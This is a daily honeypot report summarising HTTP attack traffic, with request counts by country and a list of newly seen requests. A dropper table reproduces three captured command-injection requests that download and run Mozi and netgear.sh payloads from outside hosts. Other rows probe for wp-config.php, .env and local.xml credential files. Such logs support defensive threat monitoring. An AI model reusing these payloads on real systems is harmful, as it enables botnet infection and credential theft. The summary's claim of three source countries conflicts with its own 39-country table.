Report: 2025-05-12

Author: Shoggoth Industries

Daily Report: 2025-05-12

Executive summary

Interaction report on the HTTP service of various honeypots around the world.

executive_summary

In today’s report, we detected 3 stage 1 IP address(es), linked to 3 dropper URL(s).

There are 42 new requests that have never been observed before (these were added to the monitored request database).

A total of 1093 requests were recorded during the day, originating from 3 different countries, with a peak of 188 requests coming from the US.

ot_simplified_report

Simplified report for medium-level interactions with honeypots that mimic industrial systems (website loading, or interactions with the website). For more, contact us at social@shoggoth.industries.

| source_country | targeted_country |
|---|---|
| CA | Dubai |
| US | Dubai |

botnet_dropper_behaviour

| remote_addr | request |
|---|---|
| 45.230.66.11 | GET /shell?cd+/tmp;rm+-rf+*;wget+http://45.230.66.11:11906/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1 |
| 117.205.81.124 | 27;wget%20http://%s:%d/Mozi.m%20-O%20->%20/tmp/Mozi.m;chmod%20777%20/tmp/Mozi.m;/tmp/Mozi.m%20dlink.mips%27$ HTTP/1.0 |
| 176.65.148.10 | GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=cd+/tmp;rm+-rf+*;wget+http://213.209.143.44/netgear.sh;chmod+777+netgear.sh;sh+netgear.sh;&curpath=/&currentsetting.htm=1; HTTP/1.1 |

request

The requests listed here are those that have not yet been integrated into the request database.

| | number_of_occurence | request |
|---|---|---|
| 191 | 1 | GET /Odin/http/call1747075626 HTTP/1.1 |
| 192 | 1 | GET /OdinHttpCall1747075626 HTTP/1.1 |
| 193 | 1 | GET /odinhttpcall1747075626 HTTP/1.1 |
| 207 | 1 | GET /qa/test HTTP/1.1 |
| 208 | 1 | GET /ci/test HTTP/1.1 |
| 209 | 1 | GET /CP/test HTTP/1.1 |
| 210 | 1 | GET /ad/test HTTP/1.1 |
| 211 | 1 | GET /V1/test HTTP/1.1 |
| 212 | 1 | GET /BU/test HTTP/1.1 |
| 213 | 1 | GET /js/test HTTP/1.1 |
| 214 | 1 | GET /st/test HTTP/1.1 |
| 215 | 1 | GET /Cp/test HTTP/1.1 |
| 216 | 1 | GET /bu/test HTTP/1.1 |
| 217 | 1 | GET /a/test HTTP/1.1 |
| 218 | 1 | GET /s/test HTTP/1.1 |
| 219 | 1 | GET /m/test HTTP/1.1 |
| 225 | 1 | GET /run/test HTTP/1.1 |
| 226 | 1 | GET /log/test HTTP/1.1 |
| 227 | 1 | GET /tmp/test HTTP/1.1 |
| 228 | 1 | GET /Lib/test HTTP/1.1 |
| 229 | 1 | GET /old/test HTTP/1.1 |
| 230 | 1 | GET /v3/test HTTP/1.1 |
| 231 | 1 | GET /v2/test HTTP/1.1 |
| 232 | 1 | GET /v1/test HTTP/1.1 |
| 233 | 1 | GET /ui/test HTTP/1.1 |
| 234 | 1 | GET /fm/test HTTP/1.1 |
| 235 | 1 | GET /cp/test HTTP/1.1 |
| 236 | 1 | GET /wp/test HTTP/1.1 |
| 237 | 1 | GET /en/test HTTP/1.1 |
| 238 | 1 | GET /V2/test HTTP/1.1 |
| 249 | 1 | GET /Upa7 HTTP/1.1 |
| 250 | 1 | GET /faHM HTTP/1.1 |
| 255 | 1 | GET /config/index?time=1747055289750012805 HTTP/1.1 |
| 285 | 1 | POST /api/user/binLookup?time=1747055490748327575 HTTP/1.1 |
| 286 | 1 | GET /api/bin/440393?time=1747055490103060994 HTTP/1.1 |
| 291 | 1 | GET /Odin/http/call1747015081 HTTP/1.1 |
| 292 | 1 | GET /OdinHttpCall1747015081 HTTP/1.1 |
| 293 | 1 | GET /odinhttpcall1747015081 HTTP/1.1 |
| 396 | 1 | GET /wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php HTTP/1.1 |
| 397 | 1 | GET /wp-admin/admin-ajax.php?action=duplicator_download&file=../wp-config.php HTTP/1.1 |
| 398 | 1 | GET /app/etc/local.xml HTTP/1.1 |
| 407 | 1 | GET /blog1/.env HTTP/1.1 |

country_iso_code

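| | number_of_occurence | country_iso_code |
|---|---|---|
| 0 | 188 | US |
| 1 | 127 | BD |
| 2 | 123 | GB |
| 3 | 112 | VN |
| 4 | 81 | DE |
| 5 | 62 | CH |
| 6 | 49 | BG |
| 7 | 47 | PL |
| 8 | 41 | NL |
| 9 | 29 | CA |
| 10 | 26 | AO |
| 11 | 25 | SC |
| 12 | 25 | LT |
| 13 | 17 | SG |
| 14 | 16 | KR |
| 15 | 15 | UA |
| 16 | 12 | AZ |
| 17 | 12 | IN |
| 18 | 11 | GH |
| 19 | 10 | BR |
| 20 | 9 | CN |
| 21 | 8 | ES |
| 22 | 6 | HK |
| 23 | 6 | RU |
| 24 | 5 | BE |
| 25 | 5 | PT |
| 26 | 4 | LA |
| 27 | 3 | AR |
| 28 | 3 | TH |
| 29 | 2 | VE |
| 30 | 2 | JP |
| 31 | 2 | ZM |
| 32 | 2 | MD |
| 33 | 2 | RO |
| 34 | 2 | MC |
| 35 | 1 | IT |
| 36 | 1 | FR |
| 37 | 1 | IL |
| 38 | 1 | ID |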
